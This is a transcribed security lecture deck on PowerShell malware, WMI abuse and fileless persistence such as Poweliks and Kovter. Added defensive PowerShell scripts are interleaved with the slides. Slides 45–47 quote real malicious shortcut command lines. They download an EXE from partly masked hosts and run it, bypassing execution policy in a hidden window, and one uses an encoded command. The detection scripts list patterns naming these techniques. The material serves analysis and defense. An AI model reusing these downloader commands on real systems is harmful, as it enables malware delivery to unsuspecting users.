PowerShell Malware Trends 20161118 _ CHA Minseok _ Digital Forensics Special Lecture (public edition)
Minseok(Jacky) Cha
PowerShell Malware & Fileless Technique
1. PowerMalware ?! 2016.11.18 – Public Edition
Malware and techniques that use PowerShell
AhnLab Security Emergency Response Center (ASEC) Analysis Team, CHA Minseok (車珉錫, Jacky Cha, mstoned7), Senior Researcher
2. © AhnLab, Inc. All rights reserved.
:~$whoami
Profile
− CHA Minseok (車珉錫, Jacky Cha, mstoned7)
− 7 January 1988: started computing on an Apple ][+ clone
− 1989: infected by a Brain virus variant
− 1997: joined AhnLab
− AhnLab Senior Malware Researcher
− Analyzes and researches malware in the Security Emergency Response Center (ASEC) Analysis Team
- Public-private joint investigation team, cyber security expert group
- Member of vforum, AVED, AMTSO
- Wildlist Reporter
3. :~$whoami
• Book - 보안에 미쳐라 (Go Crazy for Security), 2016
* Source: http://www.yes24.com/24/goods/29333992
4. Before we start
• No system in this world has perfect security - WarGames, starring Matthew Broderick
* Source: WarGames (1983)
5. Wrap up
• Increase in malware using PowerShell
 - Tracks the market share of Windows 7 and Windows 10
 - Usually used as a ransomware downloader
 - Now also observed in targeted attacks
• Use of WMI
 - Fileless malware can be built with it
• Outlook
 - PowerShell malware expected to increase alongside JS and VBS
 - Possibility of multi-platform malware
6. Contents
01 PowerShell
02 Malware using PowerShell
03 Technique
04 File types
05 Fileless Technique
06 Case Study
07 Closing remarks
7. 01 PowerShell
8. PowerShell
• PowerShell
 - Script language released in 2006
 - Included by default since Windows Vista
* Source: https://msdn.microsoft.com/en-us/powershell
9. Windows Management Instrumentation (WMI)
• WMI
* Source: https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
10. Windows Management Instrumentation (WMI)
• WMI Architecture
* Source: http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
11. PowerShell + WMI
• Getting antivirus product information
 - Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
12. PowerShell + WMI
• Virtual environment check
 - Get-WmiObject -Class Win32_ComputerSystem
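Slides 11 and 12 show the two WMI classes that PowerShell malware queries to learn what protection is present and whether it is running in a virtual machine. The script below is an added example, not code from the deck or from AhnLab: it runs the same two queries from the defender's side, so an analyst can see what a sample would see on a given host. It uses Get-CimInstance in place of the slide's Get-WmiObject (same classes, newer cmdlet), assumes a Windows workstation SKU for root\SecurityCenter2, and the productState byte decoding is the commonly used community interpretation of an undocumented field, labelled as such in the comments.

```powershell
# Added example (not from the slides): triage the two WMI classes the deck queries,
# root\SecurityCenter2\AntiVirusProduct and root\cimv2\Win32_ComputerSystem.
# SecurityCenter2 does not exist on server SKUs, hence the try/catch.

function Get-AvProductState {
    # productState is an undocumented bit field; the byte decoding below is the
    # widely used community interpretation, not an official Microsoft specification.
    try {
        $products = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName 'AntiVirusProduct' -ErrorAction Stop
    } catch {
        Write-Warning "root\SecurityCenter2 not available (server SKU or WMI error): $_"
        return @()
    }
    foreach ($p in $products) {
        $hex = '{0:X6}' -f [int]$p.productState   # e.g. 266240 -> '041000'
        [pscustomobject]@{
            DisplayName = $p.displayName
            StateHex    = $hex
            Enabled     = ($hex.Substring(2, 2) -eq '10')   # middle byte 0x10: real-time protection on
            UpToDate    = ($hex.Substring(4, 2) -eq '00')   # last byte 0x00: definitions current
            ExePath     = $p.pathToSignedProductExe
        }
    }
}

function Test-VirtualMachineHints {
    # The same Win32_ComputerSystem check the slide shows: malware compares
    # Manufacturer/Model against hypervisor vendor strings to avoid sandboxes.
    # Defenders run it to learn which analysis hosts are trivially fingerprintable.
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    $markers = 'VMware', 'VirtualBox', 'Virtual Machine', 'QEMU', 'KVM', 'Xen', 'Parallels', 'HVM domU'
    $hits = foreach ($m in $markers) {
        if ($cs.Manufacturer -match [regex]::Escape($m) -or $cs.Model -match [regex]::Escape($m)) { $m }
    }
    [pscustomobject]@{
        Manufacturer = $cs.Manufacturer
        Model        = $cs.Model
        LooksVirtual = [bool]$hits
        Markers      = @($hits)
    }
}

Get-AvProductState | Format-Table -AutoSize
Test-VirtualMachineHints | Format-List
```

A host that reports LooksVirtual = True with a stock Manufacturer/Model string is one that evasive PowerShell samples will refuse to run on; that is the practical reason to run the second query against your own sandbox images.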
13. 02 Malware using PowerShell
14. © AhnLab, Inc. All rights reserved.
Timeline
Years on the slide: 1993, 1998, 2000, 2004, 2006, 2007, 2013, 2014, 2015, 2016, 2017
Events placed by the dates the following slides give:
- 2000: Loveletter
- 2004: Monad announced
- 2006: PowerShell malware PoC; PowerShell released
- 2013: PowerShell ransomware
- 2014: Poweliks; Phase
- 2015: Fileless intrusion using WMI
- 2016: PowerShell + Macro appears; flood of PowerShell downloaders
Other events on the timeline (position on the slide not recoverable from the transcript): Macro virus, enhanced Batch virus, VB Script malware, Kovter, Bedep
15. 1995 – Macro virus
• 1995–2001: heyday of the macro virus
* Source:
16. 2000 - Loveletter
• 4 May 2000: LoveLetter virus
 - Spread by email
 - Used social engineering with the subject line "Iloveyou"
 - Destroyed image and music files
17. 2004 – Monad
• Concerns
 - Monad developed in 2004
* Source: https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
18. 2006 - PowerShell malware PoC
• PowerShell PoC malware
* Source: https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
19. 2006 - PowerShell Released
• PowerShell Released
* Source: http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
20. 2013 – PowerShell Ransomware
• PowerShell ransomware appears
* Source: https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
21. 2014 - Poweliks
• Poweliks
 - Stored inside the registry
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
22. 2014 - Phase
• Phase
 - Variant of Solarbot, which was discovered in 2013
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
23. 2015 – WMI abuse
• Black Hat 2015
* Source: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
24. 2015 - PowerShell malware starts to increase
• Increase in PowerShell malware
* Source: https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
25. 2016 - Macro + PowerShell
• Macro + PowerShell
* Source: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
26. 2016 - Malware using PowerShell becomes widespread
• Malware using PowerShell becomes widespread
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
27. 03 Technical
28. Conditions for in-the-wild malware
Conditions: many users; gaps in the security posture; easy to create
29. Advantages of PowerShell malware
Advantages: powerful functionality; easy to create; possibility of bypassing behavior-based products
30. Main infection vectors
• Main infection vectors
 Mail − attachment or link
 Web Browser − via exploit kit − also used for fileless malware infection
31. Infection vector
• Mail
32. PowerShell execution
• Execution permission
 - Tested running DownloadFile as an individual command and as a script
 - The individual command runs, but the script is blocked by the execution policy
33. PowerShell execution
• Bypass PowerShell execution policies
* Source: https://technet.microsoft.com/en-us/library/ee176847.aspx
34. PowerShell execution
• Bypass PowerShell execution policies
* Source: http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
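Slides 32 to 34 make the point that the execution policy stops a .ps1 file but not individual commands, and that the policy itself is routinely bypassed. The defender's counterpart to that observation is to stop relying on the policy as a control and to capture what actually ran. The script below is an added example, not code from the deck or from AhnLab: it lists every policy scope (so an unexpected Bypass can be traced to its origin), turns on PowerShell Script Block Logging and Module Logging through the same registry values Group Policy sets, and then pulls event 4104 records that contain the strings the deck's downloader samples use. It assumes PowerShell 5 or later, administrator rights, and that the pattern list and the 500-event limit are illustrative thresholds to tune.

```powershell
# Added example (not from the slides). Execution policy only gates .ps1 files; it is
# not a security boundary. Script Block Logging (PowerShell 5+) records the
# de-obfuscated script text as event 4104 in Microsoft-Windows-PowerShell/Operational,
# whatever policy flag or -EncodedCommand was used. Requires administrator rights.

function Show-ExecutionPolicyScopes {
    # Every scope, so an analyst can see where a 'Bypass' or 'Unrestricted' came from.
    Get-ExecutionPolicy -List
}

function Enable-ScriptBlockLogging {
    # Same registry values as the GPO "Turn on PowerShell Script Block Logging".
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

    # Module logging additionally records pipeline output of every module's cmdlets.
    $mod = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
    if (-not (Test-Path $mod)) { New-Item -Path $mod -Force | Out-Null }
    Set-ItemProperty -Path $mod -Name 'EnableModuleLogging' -Value 1 -Type DWord
    $names = Join-Path $mod 'ModuleNames'
    if (-not (Test-Path $names)) { New-Item -Path $names -Force | Out-Null }
    Set-ItemProperty -Path $names -Name '*' -Value '*'
}

function Get-SuspiciousScriptBlocks {
    # Recent 4104 events that contain the strings seen in the deck's samples
    # (downloader pattern, hidden window, policy bypass). Patterns are illustrative.
    param([int]$MaxEvents = 500)
    $patterns = 'DownloadFile', 'DownloadString', 'Net\.WebClient', 'FromBase64String',
                'Invoke-Expression', '\bIEX\b', '-windowstyle\s+hidden',
                '-ExecutionPolicy\s+bypass', 'Start-Process'
    $re = ($patterns -join '|')
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $re } |
        ForEach-Object {
            $ev = $_
            $found = [regex]::Matches($ev.Message, $re) | ForEach-Object { $_.Value } | Sort-Object -Unique
            [pscustomobject]@{
                Time    = $ev.TimeCreated
                Matches = @($found) -join ', '
                Snippet = (($ev.Message -split "`n")[0..2] -join ' ')
            }
        }
}

Show-ExecutionPolicyScopes
Enable-ScriptBlockLogging
Get-SuspiciousScriptBlocks | Format-Table -AutoSize -Wrap
```

Because 4104 records the script block after PowerShell has decoded it, the -EncodedCommand sample on slide 47 appears in the log as plain text; the logging survives the policy bypass that the slides describe.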
35. Functionality
• Downloader or Dropper
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
36. 04 File types
37. © AhnLab, Inc. All rights reserved.
Types
Office (DOC, DOCM, XLS, XLSM)
Shortcut (LNK)
PowerShell (PS1)
Windows Script File (WSF), HTML Application (HTA)
JavaScript / Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
38. JavaScript - JS
• JavaScript (JS)
39. Visual Basic Script
• Visual Basic Script (VBS)
40. Windows Script File (WSF)
• WSF (Windows Script File)
 - Mostly JavaScript
41. Windows Script File (WSF)
• WSF (Windows Script File)
42. HTML Application (HTA)
• HTML Application (HTA)
 - Mostly JavaScript
43. Office (DOC, DOCM, XLS, XLSM)
• Documents containing macros
44. Shortcut (LNK)
• LNK
45. Shortcut (LNK)
• Download
 - %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
46. Shortcut (LNK)
• Download
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
47. Shortcut (LNK)
• Encoding
 - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
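The three LNK command lines on slides 45 to 47 share a handful of traits: a PowerShell target, a WebClient download followed by execution of the dropped file, string splitting of the file name, a hidden window with the policy bypassed, or an -EncodedCommand payload. The script below is an added example, not code from the deck or from AhnLab: it reads the target and arguments out of .lnk files through the WScript.Shell COM object, decodes any -EncodedCommand argument (Base64 of UTF-16LE text), and scores a command line against those traits. The sample command lines at the bottom are constructed from the slide text for an offline run; the host name is a placeholder rather than the masked one on the slide, and the weights are illustrative.

```powershell
# Added example (not from the slides): triage helper for PowerShell command lines
# found in shortcut files or process-creation logs.

function Get-LnkCommandLine {
    # WScript.Shell (present on every Windows build) exposes TargetPath and Arguments.
    param([Parameter(Mandatory)][string]$Path)
    $sh  = New-Object -ComObject WScript.Shell
    $lnk = $sh.CreateShortcut((Resolve-Path $Path).Path)
    '{0} {1}' -f $lnk.TargetPath, $lnk.Arguments
}

function ConvertFrom-EncodedCommand {
    # Decoded script for every -EncodedCommand/-enc/-ec/-e argument in a command line.
    param([Parameter(Mandatory)][string]$CommandLine)
    $re = '(?i)-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})'
    foreach ($m in [regex]::Matches($CommandLine, $re)) {
        try {
            [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
        } catch { "<undecodable: $($m.Groups[1].Value.Substring(0, 12))...>" }
    }
}

function Get-PowerShellCommandLineScore {
    # Weighted indicators drawn from the deck's samples; weights are illustrative.
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = @(ConvertFrom-EncodedCommand -CommandLine $CommandLine) -join "`n"
    $text = $CommandLine + "`n" + $decoded     # score the decoded text as well
    $indicators = [ordered]@{
        'EncodedCommand'          = @{ Re = '(?i)-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{8,}'; W = 3 }
        'ExecutionPolicy bypass'  = @{ Re = '(?i)-ExecutionPolicy\s+bypass'; W = 2 }
        'Hidden window'           = @{ Re = '(?i)-windowstyle\s+hidden|-w\s+hidden'; W = 2 }
        'NoProfile'               = @{ Re = '(?i)-noprofile|-nop\b'; W = 1 }
        'WebClient download'      = @{ Re = '(?i)Net\.WebClient|DownloadFile|DownloadString'; W = 3 }
        'Launches downloaded EXE' = @{ Re = '(?i)Start-Process|cmd\s*/c'; W = 2 }
        'String splitting'        = @{ Re = "'[^']{1,6}'\s*\+\s*'[^']{1,6}'"; W = 2 }   # 'tes'+'t3.e'+'xe'
    }
    $hits = foreach ($name in $indicators.Keys) {
        if ($text -match $indicators[$name].Re) { $name }
    }
    $score = ($hits | ForEach-Object { $indicators[$_].W } | Measure-Object -Sum).Sum
    [pscustomobject]@{
        Score      = [int]$score
        Indicators = @($hits) -join '; '
        Decoded    = $decoded
        Command    = $CommandLine
    }
}

# Constructed samples modelled on slides 46 and 47 (placeholder host, benign encoded text),
# plus one ordinary administrative command line as a baseline.
$samples = @(
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'",
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand " +
        [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("Write-Output 'benign placeholder'")),
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Command Get-Process"
)
$samples | ForEach-Object { Get-PowerShellCommandLineScore -CommandLine $_ } |
    Format-Table Score, Indicators -AutoSize

# Real shortcuts from a mailbox export or user profile:
# Get-ChildItem -Recurse -Filter *.lnk | ForEach-Object { Get-PowerShellCommandLineScore (Get-LnkCommandLine $_.FullName) }
```

On the constructed input the first sample scores 10 (bypass, hidden window, no profile, WebClient download, cmd /c launch), the encoded sample scores 3 with its decoded text shown, and the baseline scores 1. The same function applies unchanged to the CommandLine field of Sysmon event 1 or Security event 4688 records.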
48. PowerShell (PS1)
• PowerShell
49. 05 Fileless Technique
50. Fileless
• Used as a fileless technique
 - Poweliks
* Source: https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
51. Fileless
• Used as a fileless technique
 - Poweliks
52. Fileless malware
• Kovter
 - The Run entry cannot be read
53. Fileless malware
• Kovter
 - Executes its script through mshta.exe
54. Fileless malware
• Kovter
 - Encoded data
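Slides 52 to 54 describe the Kovter pattern: a Run value whose name the registry editor cannot display, data that starts mshta.exe with an inline script, and an encoded payload stored in the registry rather than on disk. The script below is an added example, not code from the deck or from AhnLab: it reads the Run and RunOnce keys through the .NET registry API (which returns value names as stored, rather than the provider view that trips over unusual names), flags names containing control characters, and flags data that invokes mshta, powershell, or the script hosts with inline or encoded content or that reads a payload back out of the registry. The patterns are heuristics to tune; the self-check at the end uses constructed data, not a real sample.

```powershell
# Added example (not from the slides): hunt for Kovter-style fileless persistence
# in the Run/RunOnce keys. Heuristics only; nothing is modified or deleted.

$runKeys = @(
    @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' },
    @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' }
)

function Test-RunEntry {
    # Returns the reasons an entry looks like fileless persistence; an empty array means clean.
    param([string]$Name, [string]$Data)
    $reasons = @()
    if ($Name -eq '' -or $Name -match '[\x00-\x1F\x7F]') { $reasons += 'unreadable or empty value name' }
    if ($Data -match '(?i)\bmshta(\.exe)?\b') {
        $reasons += 'mshta launcher'
        if ($Data -match '(?i)javascript:|vbscript:') { $reasons += 'inline script in Run data' }
    }
    if ($Data -match '(?i)powershell(\.exe)?.*(-enc\b|-EncodedCommand|FromBase64String|\bIEX\b|Invoke-Expression)') {
        $reasons += 'encoded or inline PowerShell'
    }
    if ($Data -match '(?i)\b(wscript|cscript)(\.exe)?\b.*\.(js|jse|vbs|vbe|wsf)\b') { $reasons += 'script host launcher' }
    if ($Data -match '(?i)GetObject\(|HKCU|HKLM|Registry::|RegRead') { $reasons += 'reads payload back from the registry' }
    ,$reasons
}

function Get-SuspiciousRunEntries {
    foreach ($k in $runKeys) {
        $key = $k.Hive.OpenSubKey($k.Path)
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $data = [string]$key.GetValue($name, '', 'DoNotExpandEnvironmentNames')
            $why  = Test-RunEntry -Name $name -Data $data
            if ($why.Count -gt 0) {
                [pscustomobject]@{
                    Key     = '{0}\{1}' -f $k.Hive.Name, $k.Path
                    Name    = ($name -replace '[\x00-\x1F\x7F]', '?')   # printable form for the report
                    Reasons = ($why -join '; ')
                    Data    = $data
                }
            }
        }
        $key.Close()
    }
}

Get-SuspiciousRunEntries | Format-List

# Offline self-check with constructed data (not a real Kovter entry): the name carries an
# embedded NUL and the data is an mshta launcher with a placeholder inline script.
Test-RunEntry -Name "`0constructed" -Data 'C:\Windows\system32\mshta.exe "javascript:<constructed placeholder>"'
```

The self-check returns three reasons (unreadable name, mshta launcher, inline script). A hit on the last rule, data that reads from HKCU or HKLM, is the strongest of the five, because it is the defining trait of a payload that never touches the file system; that is the "encoded data" of slide 54.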
55. 06 Case Study
56. 07 Closing remarks
57. Error
• Windows PowerShell has stopped working
 - A Windows PowerShell error can appear without warning
58. Response
• WMI for Detection and Response
* Source: https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
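The deck cites WMI twice: as the persistence mechanism behind the fileless backdoor of slide 23 and, here on slide 58, as a detection and response tool. The two meet in the root\subscription namespace, where a permanent event subscription is always three objects, an __EventFilter (the trigger query), an __EventConsumer (what runs), and a __FilterToConsumerBinding that joins them. The script below is an added example, not code from the deck or from AhnLab: it lists every binding with its filter query and consumer payload so the set can be reviewed by hand. It assumes administrator rights and that the "Suspicious" keyword list is a starting point, not a verdict; nothing is removed.

```powershell
# Added example (not from the slides): enumerate permanent WMI event subscriptions.
# Legitimate software rarely creates these, so the full list is usually short enough
# to review by eye. Needs administrator rights; read-only.

function Get-RefName {
    # Binding properties are references; Get-CimInstance returns them as objects,
    # Get-WmiObject as path strings like __EventFilter.Name="x". Handle both.
    param($Ref)
    if ($Ref -is [string]) { $Ref -replace '^.*Name="([^"]*)".*$', '$1' } else { $Ref.Name }
}

function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer   # base class: all consumer types
    $bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $cName | Select-Object -First 1
        $type = if ($c) { $c.CimClass.CimClassName } else { '<dangling consumer reference>' }

        # What the consumer actually runs depends on its subclass.
        $payload = switch ($type) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' {
                $body = if ($c.ScriptText) { $c.ScriptText } else { "file: $($c.ScriptFileName)" }
                '{0}: {1}' -f $c.ScriptingEngine, $body
            }
            default { $type }
        }
        [pscustomobject]@{
            Filter       = $fName
            Query        = if ($f) { $f.Query } else { '<dangling filter reference>' }
            ConsumerType = $type
            Consumer     = $cName
            Payload      = $payload
            Suspicious   = ($type -eq 'ActiveScriptEventConsumer') -or
                           ($payload -match '(?i)powershell|mshta|wscript|cscript|cmd(\.exe)?\s|-enc\b|FromBase64')
        }
    }
}

Get-WmiPersistence | Sort-Object Suspicious -Descending | Format-List
```

An ActiveScriptEventConsumer is flagged unconditionally because it runs VBScript or JScript in-process from the repository, which is exactly the fileless construction the 2015 paper describes; a CommandLineEventConsumer is judged by what its template launches. Run the same enumeration on a known-good image first so that vendor-created subscriptions can be excluded by name.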
59. Outlook
• Expansion of PowerShell
* Source: https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
60. © AhnLab, Inc. All rights reserved.
Outlook
Replacing JS and VBS ?!
Obfuscation
Cross-Platform
61. Wrap up
• Increase in malware using PowerShell
 - Tracks the market share of Windows 7 and Windows 10
 - Usually used as a ransomware downloader
 - Now also observed in targeted attacks
• Use of WMI
 - Fileless malware can be built with it
• Outlook
 - PowerShell malware expected to increase alongside JS and VBS
 - Possibility of multi-platform malware
62. Today's security problem
• Not really a fair fight
* Source: http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
63. Today's security problem
• Security is something everyone has to do together
* Source: http://www.security-marathon.be/?p=1786
64. Q&A
email: minseok.cha@ahnlab.com / mstoned7@gmail.com
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
65. Reference
• Ryan Kazanciyan & Matt Hastings, "Investigating PowerShell Attacks", 2014
• Matt Graeber, "Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor", 2015
• Santiago M. Pontiroli & F. Roberto Martinez, "The Tao of .NET and PowerShell Malware Analysis", 2015
• Kim Seunghoon / AhnLab, "Macro Downloader Analysis", 2016